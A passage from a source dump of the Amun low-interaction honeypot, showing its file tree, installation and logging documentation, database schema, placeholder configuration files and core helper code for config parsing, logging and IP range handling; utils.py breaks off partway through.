├── .gitignore
├── AUTHORS
├── CHANGELOG
├── CREDITS
├── INSTALL
├── LICENSE
├── README.md
├── amun_server.py
├── conf
    ├── amun.conf
    ├── amun_db.sql
    ├── log-hpfeeds.conf
    ├── log-mail.conf
    ├── log-mysql.conf
    ├── log-pgsql.conf
    ├── log-sarcophagus.conf
    ├── log-surfnet.conf
    ├── submit-anubis.conf
    ├── submit-cwsandbox.conf
    ├── submit-joebox.conf
    └── submit-mwportal.conf
├── core
    ├── amun_bindport_core.py
    ├── amun_config_parser.py
    ├── amun_logging.py
    ├── amun_rdp_core.py
    ├── amun_request_handler.py
    ├── amun_smb_core.py
    ├── download_core.py
    ├── ftp_download_core.py
    ├── iprange.py
    ├── shellcode_mgr_core.py
    ├── shellemulator.py
    ├── tftp_download_core.py
    ├── utils.py
    └── vulngenerator.py
├── docs
    ├── Makefile
    ├── build
    │   ├── doctrees
    │   │   ├── configuration.doctree
    │   │   ├── environment.pickle
    │   │   ├── index.doctree
    │   │   └── installation.doctree
    │   └── html
    │   │   ├── .buildinfo
    │   │   ├── _sources
    │   │       ├── configuration.txt
    │   │       ├── index.txt
    │   │       └── installation.txt
    │   │   ├── _static
    │   │       ├── ajax-loader.gif
    │   │       ├── basic.css
    │   │       ├── comment-bright.png
    │   │       ├── comment-close.png
    │   │       ├── comment.png
    │   │       ├── default.css
    │   │       ├── doctools.js
    │   │       ├── down-pressed.png
    │   │       ├── down.png
    │   │       ├── file.png
    │   │       ├── jquery.js
    │   │       ├── minus.png
    │   │       ├── plus.png
    │   │       ├── pygments.css
    │   │       ├── searchtools.js
    │   │       ├── sidebar.js
    │   │       ├── underscore.js
    │   │       ├── up-pressed.png
    │   │       ├── up.png
    │   │       └── websupport.js
    │   │   ├── configuration.html
    │   │   ├── genindex.html
    │   │   ├── index.html
    │   │   ├── installation.html
    │   │   ├── objects.inv
    │   │   ├── search.html
    │   │   └── searchindex.js
    └── source
    │   ├── conf.py
    │   ├── configuration.rst
    │   ├── index.rst
    │   └── installation.rst
├── hexdumps
    └── .empty
├── http_images
    ├── logo_right.png
    └── style.css.phpmyadmin
├── log_modules
    ├── log-blastomat
    │   └── log_blastomat.py
    ├── log-hpfeeds
    │   ├── log_hpfeeds.py
    │   └── log_hpfeeds.py.new_channels
    ├── log-mail
    │   └── log_mail.py
    ├── log-mysql
    │   └── log_mysql.py
    ├── log-pgsql
    │   └── log_pgsql.py
    ├── log-sarcophagus
    │   └── log_sarcophagus.py
    ├── log-surfnet
    │   └── log_surfnet.py
    └── log-syslog
    │   └── log_syslog.py
├── malware
    └── md5sum
    │   └── .empty
├── shellcodes
    └── decoders.py
├── submit_modules
    ├── submit-anubis
    │   └── submit_anubis.py
    ├── submit-cwsandbox
    │   └── submit_cwsandbox.py
    ├── submit-joebox
    │   └── submit_joebox.py
    ├── submit-md5
    │   └── submit_md5.py
    ├── submit-mwportal
    │   └── submit_mwportal.py
    └── submit-mysql
    │   └── submit_mysql.py
├── utils
    ├── checkCode.py
    ├── cut_file.py
    ├── listIPs.py
    └── xml_vuln_creator
    │   ├── vuln_creator.py
    │   ├── xml_arc.xml
    │   ├── xml_arkeia.xml
    │   ├── xml_bagle.xml
    │   ├── xml_ca.xml
    │   ├── xml_dameware.xml
    │   ├── xml_ftpd.xml
    │   ├── xml_helix.xml
    │   ├── xml_http.xml
    │   ├── xml_iis.xml
    │   ├── xml_imail.xml
    │   ├── xml_lsass.xml
    │   ├── xml_maxdb.xml
    │   ├── xml_mercurymail.xml
    │   ├── xml_ms08067.xml
    │   ├── xml_msmq.xml
    │   ├── xml_openview.xml
    │   ├── xml_pnp.xml
    │   ├── xml_rync.xml
    │   ├── xml_sub7.xml
    │   ├── xml_tivoli.xml
    │   ├── xml_trend.xml
    │   └── xml_vnc.xml
└── vuln_modules
    ├── vuln-analyzer
        ├── analyzer_modul.py
        └── analyzer_shellcodes.py
    ├── vuln-arc
        ├── arc_modul.py
        └── arc_shellcodes.py
    ├── vuln-arkeia
        ├── arkeia_modul.py
        └── arkeia_shellcodes.py
    ├── vuln-axigen
        ├── axigen_modul.py
        └── axigen_shellcodes.py
    ├── vuln-bagle
        ├── bagle_modul.py
        └── bagle_shellcodes.py
    ├── vuln-ca
        ├── ca_modul.py
        └── ca_shellcodes.py
    ├── vuln-check
        ├── check_modul.py
        └── check_shellcodes.py
    ├── vuln-cyruspop3
        ├── cyruspop3_modul.py
        └── cyruspop3_shellcodes.py
    ├── vuln-dameware
        ├── dameware_modul.py
        └── dameware_shellcodes.py
    ├── vuln-dcom
        ├── dcom_modul.py
        └── dcom_shellcodes.py
    ├── vuln-ftpd
        ├── ftpd_modul.py
        └── ftpd_shellcodes.py
    ├── vuln-goodtech
        ├── goodtech_modul.py
        └── goodtech_shellcodes.py
    ├── vuln-helix
        ├── helix_modul.py
        └── helix_shellcodes.py
    ├── vuln-hpopenview
        ├── hpopenview_modul.py
        └── hpopenview_shellcodes.py
    ├── vuln-http
        ├── http_modul.py
        └── http_shellcodes.py
    ├── vuln-iis
        ├── iis_modul.py
        └── iis_shellcodes.py
    ├── vuln-imail
        ├── imail_modul.py
        └── imail_shellcodes.py
    ├── vuln-lotusdomino
        ├── lotusdomino_modul.py
        └── lotusdomino_shellcodes.py
    ├── vuln-maxdb
        ├── maxdb_modul.py
        └── maxdb_shellcodes.py
    ├── vuln-mdaemon
        ├── mdaemon_modul.py
        └── mdaemon_shellcodes.py
    ├── vuln-mercury
        ├── mercury_modul.py
        └── mercury_shellcodes.py
    ├── vuln-msdtc
        ├── msdtc_modul.py
        └── msdtc_shellcodes.py
    ├── vuln-msmq
        ├── msmq_modul.py
        └── msmq_shellcodes.py
    ├── vuln-mssql
        ├── mssql_modul.py
        ├── mssql_modul.py.old
        └── mssql_shellcodes.py
    ├── vuln-mydoom
        ├── mydoom_modul.py
        └── mydoom_shellcodes.py
    ├── vuln-mysql
        ├── mysql_modul.py
        └── mysql_shellcodes.py
    ├── vuln-peercast
        ├── peercast_modul.py
        └── peercast_shellcodes.py
    ├── vuln-rdp
        ├── rdp_modul.py
        └── rdp_shellcodes.py
    ├── vuln-realvnc
        ├── realvnc_modul.py
        └── realvnc_shellcodes.py
    ├── vuln-rsync
        ├── rsync_modul.py
        └── rsync_shellcodes.py
    ├── vuln-sasserftpd
        └── sasserftpd_modul.py
    ├── vuln-slmail
        ├── slmail_modul.py
        └── slmail_shellcodes.py
    ├── vuln-smb
        ├── smb_modul.py
        └── smb_shellcodes.py
    ├── vuln-speedport
        ├── speedport_modul.py
        └── speedport_shellcodes.py
    ├── vuln-sub7
        ├── sub7_modul.py
        └── sub7_shellcodes.py
    ├── vuln-symantec
        ├── symantec_modul.py
        └── symantec_shellcodes.py
    ├── vuln-tivoli
        ├── tivoli_modul.py
        └── tivoli_shellcodes.py
    ├── vuln-trend
        ├── trend_modul.py
        └── trend_shellcodes.py
    ├── vuln-upnp
        ├── upnp_modul.py
        └── upnp_shellcodes.py
    ├── vuln-veritas
        ├── veritas_modul.py
        └── veritas_shellcodes.py
    └── vuln-wins
        ├── wins_modul.py
        └── wins_shellcodes.py


/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | *.pyo
3 | *.conf
4 | 


--------------------------------------------------------------------------------
/AUTHORS:
--------------------------------------------------------------------------------
1 | Current Developers:
2 | - Jan Goebel ( jan-go at gmx dot de )
3 | 


--------------------------------------------------------------------------------
/CREDITS:
--------------------------------------------------------------------------------
 1 | Credits/Thanks fly to:
 2 | * Berend-Jan Wever (http://www.edup.tudelft.nl/~bjwever/)
 3 | * Phrack Volume 0x0b, Issue 0x39, Phile #0x0f of 0x12
 4 | * The guys from Nepenthes/MWCollect Alliance (http://nepenthes.mwcollect.org/)
 5 | * Milw0rm (http://www.milw0rm.com/)
 6 | * Metasploit (http://metasploit.com/)
 7 | * The guys from Anubis (http://analysis.seclab.tuwien.ac.at/index.php)
 8 | * katsumi (http://grospolina.org/)
 9 | * GlasBlog (http://glasblog.1durch0.de/glaslos/)
10 | * JoeBox (http://www.joebox.org/)
11 | * Carsten Willems CWSandbox (http://cwsandbox.org)
12 | * Kees Trippelvitz (surfnet.nl)
13 | 


--------------------------------------------------------------------------------
/INSTALL:
--------------------------------------------------------------------------------
 1 | -- Amun: Installation Instructions --
 2 | 
 3 | :: Requirements:
 4 |     - Python >= 2.6
 5 |     - (optional) Python Psyco (available at http://psyco.sourceforge.net/)
 6 |     - (optional) MySQLdb if submit-mysql or log-mysql is used
 7 |     - (optional) psycopg2 if log-surfnet is used
 8 | 
 9 | :: Installation:
10 |     - change the amun.conf file to fit your needs (conf/amun.conf)
11 |         - set the ip address for amun to listen on (0.0.0.0 to listen on all)
12 | 
13 |     - start the software with "./amun_server"
14 |     - stop the software with strg+c
15 | 
16 | :: Max Open Files:
17 |     - To increase the maximum number of open files on Linux:
18 |         - echo "104854" > /proc/sys/fs/file-max
19 | 	- ulimit -Hn 104854
20 | 	- ulimit -n 104854
21 |     - To increase the maximum number of open files on BSD:
22 |     	- sysctl kern.maxfiles=104854
23 | 	- ulimit -Hn 104854
24 | 	- ulimit -n 104854
25 | 
26 | :: Logging
27 |     - all logging information are stored in the "logs" directory
28 | 
29 |     - amun_server.log
30 |         - contains general information, errors, and alive messages of the amun server
31 |     - amun_request_handler.log
32 |         - contains information about unknown exploits and not matched exploit stages
33 |     - analysis.log
34 |         - contains information about manual shellcode analysis (performed via the -a option)
35 |     - download.log
36 |         - contains information about all download modules (ftp, tftp, bindport, etc...)
37 |     - exploits.log
38 |         - contains information about all exploits that where triggert
39 |     - shellcode_manager.log
40 |         - contains information and errors of the shellcode manager
41 |     - submissions.log
42 |         - contains information about unique downloads
43 |     - successfull_downloads.log
44 |     	- contains information about all downloaded malware
45 |     - unknown_downloads.log
46 |     	- contains information about unknown download methods
47 |     - vulnerabilities.log
48 |     	- contains information about certain vulnerability modules
49 | 
50 | :: Parameters
51 |     - amun can be executed with -a parameter to analyse a given file for known shellcode
52 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## Amun
 2 | 
 3 | Amun was the first python-based low-interaction honeypot, following the concepts of Nepenthes but extending it with
 4 | more sophisticated emulation and easier maintenance.
 5 | 
 6 | ## Requirements
 7 | 
 8 | * Pyhon >= 2.6 (no Python3 support yet)
 9 | * (optional) Python Psyco (available at http://psyco.sourceforge.net/)
10 | * (optional) MySQLdb if submit-mysql or log-mysql is used
11 | * (optional) psycopg2 if log-surfnet is used
12 | 
13 | ## Installation
14 | 
15 | * Clone Git repository: `git clone https://github.com/zeroq/amun.git`
16 | * Edit Amun main configuration file: `vim conf/amun.conf`
17 |   * for example set the ip address for Amun to listen on (0.0.0.0 to listen on all)
18 |   * enable or disbale vulnerability modules as needed
19 | * start the Amun by issuing: `./amun_server`
20 | 
21 | ## Tips and Tricks
22 | 
23 | In case you encounter problems with too many open files due to a lot of attackers hitting your honeypot at the same time, the following settings can be adjusted:
24 | 
25 | * To increase the maximum number of open files on Linux:
26 |   * `echo "104854" > /proc/sys/fs/file-max`
27 |   * `ulimit -Hn 104854`
28 |   * `ulimit -n 104854`
29 | * To increase the maximum number of open files on BSD:
30 |   * `sysctl kern.maxfiles=104854`
31 |   * `ulimit -Hn 104854`
32 |   * `ulimit -n 104854`
33 | 
34 | ## Logging
35 | 
36 | All logging information are stored in the "logs" subdirectory of your Amun installation. Following log files will be created:
37 | 
38 | * amun\_server.log
39 |   * contains general information, errors, and alive messages of the amun server
40 | * amun\_request\_handler.log
41 |   * contains information about unknown exploits and not matched exploit stages
42 | * analysis.log
43 |   * contains information about manual shellcode analysis (performed via the -a option)
44 | * download.log
45 |   * contains information about all download modules (ftp, tftp, bindport, etc...)
46 | * exploits.log
47 |   * contains information about all exploits that where triggert
48 | * shellcode_manager.log
49 |   * contains information and errors of the shellcode manager
50 | * submissions.log
51 |   * contains information about unique downloads
52 | * successfull_downloads.log
53 |   * contains information about all downloaded malware
54 | * unknown_downloads.log
55 |   * contains information about unknown download methods
56 | * vulnerabilities.log
57 |   * contains information about certain vulnerability modules
58 | 
59 | ## Parameters
60 | 
61 | Amun can be executed with `-a` parameter to analyse a given file for known shellcode instead of running the honeypot. 
62 | 


--------------------------------------------------------------------------------
/conf/amun_db.sql:
--------------------------------------------------------------------------------
 1 | -- MySQL dump 10.11
 2 | --
 3 | -- Host: localhost    Database: amun_db
 4 | -- ------------------------------------------------------
 5 | 
 6 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
 7 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
 8 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
 9 | /*!40101 SET NAMES utf8 */;
10 | /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
11 | /*!40103 SET TIME_ZONE='+00:00' */;
12 | /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
13 | /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
14 | /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
15 | /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
16 | 
17 | --
18 | -- Current Database: `amun_db`
19 | --
20 | 
21 | CREATE DATABASE /*!32312 IF NOT EXISTS*/ `amun_db` /*!40100 DEFAULT CHARACTER SET latin1 */;
22 | 
23 | USE `amun_db`;
24 | 
25 | --
26 | -- Table structure for table `amun_binaries`
27 | --
28 | 
29 | DROP TABLE IF EXISTS `amun_binaries`;
30 | CREATE TABLE `amun_binaries` (
31 |   `id` bigint(20) NOT NULL,
32 |   `binary_data` longblob NOT NULL,
33 |   PRIMARY KEY  (`id`)
34 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
35 | 
36 | --
37 | -- Table structure for table `amun_cwsandbox`
38 | --
39 | 
40 | DROP TABLE IF EXISTS `amun_cwsandbox`;
41 | CREATE TABLE `amun_cwsandbox` (
42 |   `id` int(11) NOT NULL,
43 |   `cwanalyse` longtext NOT NULL,
44 |   `flag` int(11) NOT NULL,
45 |   `comment` varchar(255) NOT NULL,
46 |   `timestamp` timestamp NULL default NULL,
47 |   `priority` smallint(6) NOT NULL default '0',
48 |   `notification_email` text,
49 |   `binary_data` mediumblob,
50 |   PRIMARY KEY  (`id`),
51 |   KEY `priority` (`priority`,`id`)
52 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
53 | 
54 | --
55 | -- Table structure for table `amun_storage`
56 | --
57 | 
58 | DROP TABLE IF EXISTS `amun_storage`;
59 | CREATE TABLE `amun_storage` (
60 |   `id` int(11) NOT NULL auto_increment,
61 |   `md5hash` varchar(32) NOT NULL,
62 |   `filesize` int(11) NOT NULL,
63 |   `comment` varchar(255) NOT NULL,
64 |   PRIMARY KEY  (`id`),
65 |   UNIQUE KEY `md5hash` (`md5hash`)
66 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
67 | 
68 | 
69 | CREATE TABLE IF NOT EXISTS `amun_connections_currentDate` ( 
70 | 	id INT(11) NOT NULL AUTO_INCREMENT, 
71 | 	timestamp INT(11) NOT NULL, 
72 | 	hostileip VARCHAR(255) NOT NULL, 
73 | 	hostileport VARCHAR(255) NOT NULL, 
74 | 	targetip VARCHAR(255) NOT NULL, 
75 | 	targetport VARCHAR(255) NOT NULL, 
76 | 	DialogueName VARCHAR(255) NOT NULL, 
77 | 	count int(11) NOT NULL DEFAULT '1', 
78 | 	warned INT(11) NOT NULL DEFAULT '0', 
79 | 	PRIMARY KEY (id), 
80 | 	KEY hostileip (hostileip), 
81 | 	KEY targetip (targetip), 
82 | 	KEY DialogueName (DialogueName) 
83 | ) ENGINE = MYISAM;
84 | 
85 | CREATE TABLE IF NOT EXISTS amun_hits_currentDate ( 
86 | 	eventid INT(11) NOT NULL AUTO_INCREMENT, 
87 | 	hostileip VARCHAR(255) NOT NULL, 
88 | 	targetip VARCHAR(255) NOT NULL, 
89 | 	timestamp INT(11) NOT NULL, 
90 | 	downurl TINYTEXT NOT NULL, 
91 | 	binaryid INT(11) NOT NULL DEFAULT '0', 
92 | 	PRIMARY KEY (eventid), 
93 | 	KEY hostileip (hostileip), 
94 | 	KEY targetip (targetip), 
95 | 	KEY binaryid (binaryid), 
96 | 	KEY downurl (downurl(250)) 
97 | ) ENGINE = MYISAM;
98 | 


--------------------------------------------------------------------------------
/conf/log-hpfeeds.conf:
--------------------------------------------------------------------------------
1 | [log-hpfeeds]
2 | server: 127.0.0.1
3 | port: 20000
4 | identifier: amun-1
5 | secret: secret
6 | debug: 0
7 | 


--------------------------------------------------------------------------------
/conf/log-mail.conf:
--------------------------------------------------------------------------------
 1 | [Log-Mail]
 2 | 
 3 | ### define smtp server for outgoing mail
 4 | smtpServer: serverIPorName
 5 | smtpPort: 25
 6 | 
 7 | ### define sender and recipient addresses (unused fields set to None)
 8 | mailFrom: amun@honeypot.de
 9 | mailReplyTo: email@domain.com
10 | recipientList: email1@domain.com,email2@domain.com
11 | mailCCList: None 
12 | 
13 | ### define default mail text
14 | mailBody: Hello,\nyour Amun sensor reported a successfull attack.\nLogline is attached.
15 | 


--------------------------------------------------------------------------------
/conf/log-mysql.conf:
--------------------------------------------------------------------------------
1 | [Log-MySQL]
2 | 
3 | MySQLHost: 127.0.0.1
4 | MySQLUser: mysqlUser
5 | MySQLPass: mysqlPass
6 | MySQLDB: amun_db
7 | 


--------------------------------------------------------------------------------
/conf/log-pgsql.conf:
--------------------------------------------------------------------------------
1 | [Log-pgSQL]    
2 | 
3 | pgSQLHost: 127.0.0.1
4 | pgSQLUser: postgres
5 | pgSQLPass: notset
6 | pgSQLDB: honeypot_amun
7 | 


--------------------------------------------------------------------------------
/conf/log-sarcophagus.conf:
--------------------------------------------------------------------------------
1 | [Log-Sarcophagus]
2 | 
3 | pgSQLHost: 127.0.0.1
4 | pgSQLUser: jan
5 | pgSQLPass: 
6 | pgSQLDB: honeypot_amun
7 | 
8 | sensorID: 1
9 | 


--------------------------------------------------------------------------------
/conf/log-surfnet.conf:
--------------------------------------------------------------------------------
 1 | [Log-Surfnet]
 2 | 
 3 | sensorIP: 127.0.0.1
 4 | 
 5 | PGHost: HostIP
 6 | PGPort: 5432
 7 | PGUser: Username
 8 | PGPass: Password
 9 | PGDB: Database
10 | 


--------------------------------------------------------------------------------
/conf/submit-anubis.conf:
--------------------------------------------------------------------------------
 1 | [Submit-Anubis]
 2 | 
 3 | ### define the email address reports should be sent to 
 4 | ### (set to None if only logging to submission.log should be enabled)
 5 | reportToEmail: None
 6 | 
 7 | ### set to 1 if result URL should always be logged in the submission.log
 8 | alwaysLog: 0
 9 | 
10 | ### url for submission to anubis
11 | anubisURL: http://anubis.iseclab.org/submit.php
12 | 
13 | ### result url if no email supplied
14 | anubisResultURL: http://anubis.iseclab.org/?action=result
15 | 


--------------------------------------------------------------------------------
/conf/submit-cwsandbox.conf:
--------------------------------------------------------------------------------
1 | [Submit CWSandbox]
2 | 
3 | ### define the email address reports should be sent to
4 | reportToEmail: yourEMAIL
5 | 
6 | ### url for submission to cwsandbox
7 | cwsandboxURL: http://www.mwanalysis.org/submit.php
8 | 


--------------------------------------------------------------------------------
/conf/submit-joebox.conf:
--------------------------------------------------------------------------------
1 | [Submit joebox]
2 | 
3 | ### define the email address reports should be sent to
4 | reportToEmail: yourEMAIL
5 | 
6 | ### url for submission to joebox
7 | joeboxservletURL: http://analysis.joebox.org/joeboxservlet/submit
8 | 


--------------------------------------------------------------------------------
/conf/submit-mwportal.conf:
--------------------------------------------------------------------------------
1 | [Submit MWPortal]
2 | 
3 | ### define the email address reports should be sent to
4 | token: yourTOKEN
5 | 
6 | ### url for submission to mwportal
7 | mwportalURL: http://127.0.0.1:8000/mwportal/api/
8 | 


--------------------------------------------------------------------------------
/core/amun_config_parser.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import re
19 | import os.path
20 | 
21 | class AmunConfigParser:
22 | 	def __init__(self, filename):
23 | 		if os.path.exists(filename):
24 | 			try:
25 | 				self.filename = filename
26 | 				fp = open(filename, 'r')
27 | 				content = fp.read()
28 | 				fp.close()
29 | 				self.contentList = content.split('\n')
30 | 			except IOError:
31 | 				self.contentList = None
32 | 				return None
33 | 		else:
34 | 			self.contentList = None
35 | 			return None
36 | 
37 | 	def getSingleValue(self, attribute):
38 | 		regString = '^(%s)\s*(:|=)\s*(.*)' % (attribute)
39 | 		lookup = re.compile(regString)
40 | 		for line in self.contentList:
41 | 			match = lookup.search(line)
42 | 			if match:
43 | 				if len(match.groups()[2])>0:
44 | 					return match.groups()[2]
45 | 				return None
46 | 		return None
47 | 
48 | 	def getListValues(self, attribute):
49 | 		attrList = []
50 | 		begin = False
51 | 		regString = '^(%s)\s*(:|=)\s*' % (attribute)
52 | 		lookup = re.compile(regString, re.S )
53 | 		for item in self.contentList:
54 | 			line = item.strip()
55 | 			if not begin:
56 | 				match = lookup.search(line)
57 | 				if match:
58 | 					begin = True
59 | 					continue
60 | 			if begin and line.startswith('#') and not line.startswith('###'):
61 | 				continue
62 | 			if begin and line.startswith('###'):
63 | 				begin = False
64 | 				break
65 | 			if begin and not line.endswith(',') and len(line)>0:
66 | 				attrList.append(line)
67 | 				begin = False
68 | 				break
69 | 			if begin and len(line)>0:
70 | 				attrList.append(line.strip(','))
71 | 		return attrList
72 | 
73 | 
74 | 	def reloadConfig(self):
75 | 		if os.path.exists(self.filename):
76 | 			try:
77 | 				fp = open(self.filename, 'r')
78 | 				content = fp.read()
79 | 				fp.close()
80 | 				self.contentList = content.split('\n')
81 | 				return True, None
82 | 			except IOError, e:
83 | 				self.contentList = None
84 | 				return False, e
85 | 		else:
86 | 			self.contentList = None
87 | 			return False, None
88 | 
89 | 


--------------------------------------------------------------------------------
/core/amun_logging.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | 
13 | try:
14 | 	import psyco ; psyco.full()
15 | 	from psyco.classes import *
16 | except ImportError:
17 | 	pass
18 | 
19 | import time
20 | 
21 | class amun_logging:
22 | 	def __init__(self, classname, Logger=None):
23 | 		self.classname = classname
24 | 		self.logfile = "logs/%s.log" % (self.classname)
25 | 		self.Logger = Logger
26 | 
27 | 	def log(self, message, tabs=0, type="normal", Log=False, display=True):
28 | 		try:
29 | 			if not Log and not display:
30 | 				return
31 | 			empty = ""
32 | 			for i in xrange(0, tabs):
33 | 				empty += " "
34 | 		
35 | 			if display:
36 | 				if type=="debug":
37 | 					### blue
38 | 					print "\033[0;34m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
39 | 				elif type=="warn":
40 | 					### yellow
41 | 					print "\033[0;33m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
42 | 				elif type=="info":
43 | 					### green
44 | 					print "\033[0;32m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
45 | 				elif type=="crit":
46 | 					### red
47 | 					print "\033[0;31m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
48 | 				elif type=="fade":
49 | 					### almost white
50 | 					print "\033[0;37m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
51 | 				elif type=="div":
52 | 					### lighter blue
53 | 					print "\033[0;36m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
54 | 				else:
55 | 					### black
56 | 					print "\033[0m%s.::[Amun - %s] %s ::.\033[0m" % (empty, self.classname, message)
57 | 
58 | 			if Log and self.Logger!=None:
59 | 				logline = "[%s] %s" % (self.classname, message)
60 | 				self.Logger.info(logline)
61 | 			elif Log:
62 | 				logline = "[%s][%s] %s\n" % (time.strftime('%Y-%m-%d %H:%M:%S'), self.classname, message)
63 | 				try:
64 | 					fp = open(self.logfile, 'a+')
65 | 					fp.write(logline)
66 | 					fp.close()
67 | 				except IOError, e:
68 | 					print "\033[0;31m%s.::[Amun - %s] %s ::.\033[0m"  % (empty, self.classname, message)
69 | 		except KeyboardInterrupt:
70 | 			raise
71 | 


--------------------------------------------------------------------------------
/core/iprange.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | 
13 | try:
14 | 	import psyco ; psyco.full()
15 | 	from psyco.classes import *
16 | except ImportError:
17 | 	pass
18 | 
19 | class IPRange:
20 |         def __init__(self, net):
21 | 		try:
22 | 	                self.net = net
23 |         	        (self.ip, self.pattern) = net.split("/")
24 |                 	self.ip = self.dottedQuadToNum(self.ip)
25 | 	                if self.pattern == "" or self.pattern == "0":
26 |         	                self.pattern = ~0
27 |                 	else:
28 |                         	self.pattern = ~int("1" * (32 - int(self.pattern)), 2)
29 | 		except KeyboardInterrupt:
30 | 			raise
31 | 
32 |         def contains(self, tip):
33 | 		try:
34 | 	                return self.ip & self.pattern == self.dottedQuadToNum(tip) & self.pattern
35 | 		except KeyboardInterrupt:
36 | 			raise
37 | 
38 |         def dottedQuadToNum(self,ip):
39 | 		try:
40 | 	                l = map(int, ip.split('.'))
41 |        		        addr = 0
42 |                		for byte in l:
43 |                        		addr = 256*addr+byte
44 | 	                return long(addr)
45 | 		except KeyboardInterrupt:
46 | 			raise
47 | 


--------------------------------------------------------------------------------
/core/utils.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import re
 19 | import struct
 20 | import socket
 21 | import subprocess
 22 | 
 23 | class utilities(object):
 24 | 	__slots__ = ("ipReg", "ipRange", "ipCIDR", "deviceIP", "resultIPlist")
 25 | 
 26 | 	def __init__(self):
 27 | 		self.ipReg = re.compile("(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
 28 | 		self.ipRange = re.compile("(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*\-\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
 29 | 		self.ipCIDR = re.compile("(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/(\d{2})")
 30 | 		self.deviceIP = re.compile("inet (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/");
 31 | 		self.resultIPlist = []
 32 | 
 33 | 	def genIPList(self, IPentry):
 34 | 		IPentryList = []
 35 | 		### check for comma and split
 36 | 		if IPentry.count(',')>0:
 37 | 			IPentryList = IPentry.split(',')
 38 | 		else:
 39 | 			IPentryList.append(IPentry)
 40 | 
 41 | 		for entry in IPentryList:
 42 | 			match = self.ipRange.search(entry)
 43 | 			if match:
 44 | 				self.getIPsFromRange(match.groups())
 45 | 				continue
 46 | 			match = self.ipCIDR.search(entry)
 47 | 			if match:
 48 | 				self.getIPsFromCIDR(match.groups())
 49 | 				continue
 50 | 			match = self.ipReg.search(entry)
 51 | 			if match:
 52 | 				self.getSingleIP(match.groups())
 53 | 				continue
 54 | 			if entry.startswith('eth') or entry.startswith('ppp') or entry.startswith('lo'):
 55 | 				self.getIPsFromDevice(IPentry)
 56 | 				continue
 57 | 		return self.resultIPlist
 58 | 
 59 | 	def getSingleIP(self, ipGroup):
 60 | 		### 192.168.0.1
 61 | 		self.resultIPlist.append(ipGroup[0].strip())
